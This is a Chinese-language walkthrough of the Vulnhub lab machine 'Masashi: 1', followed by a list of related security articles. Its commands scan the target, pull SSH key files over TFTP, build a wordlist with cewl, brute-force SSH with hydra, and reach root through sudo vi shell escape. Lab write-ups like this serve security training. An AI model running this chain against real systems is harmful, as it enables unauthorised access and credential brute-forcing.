Vulnhub: Masashi: 1靶机

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

查看80端口的robots.txt提示三个文件

snmpwalk.txt内容,tftp服务在1337端口

sshfolder.txt内容,提示用户名sv5

tftp连接目标下载id_rsaid_rsa.pub

tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

提权

sv5用户sudo权限

提升为root

sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

flag

相关推荐
G丶AEOM34 分钟前
SSL/TLS,SSL,TLS分别是什么
网络·网络协议·网络安全
儒道易行37 分钟前
【DVWA】RCE远程命令执行实战
网络·安全·网络安全
Hacker_LaoYi1 小时前
网络安全与加密
安全·web安全
Koi慢热2 小时前
路由基础(全)
linux·网络·网络协议·安全
hzyyyyyyyu3 小时前
内网安全隧道搭建-ngrok-frp-nps-sapp
服务器·网络·安全
网络研究院3 小时前
国土安全部发布关键基础设施安全人工智能框架
人工智能·安全·框架·关键基础设施
Daniel 大东5 小时前
BugJson因为json格式问题OOM怎么办
java·安全
中云DDoS CC防护蔡蔡6 小时前
微信小程序被攻击怎么选择高防产品
服务器·网络安全·微信小程序·小程序·ddos
EasyNVR9 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash12 小时前
【D01】网络安全概论
网络·安全·web安全·php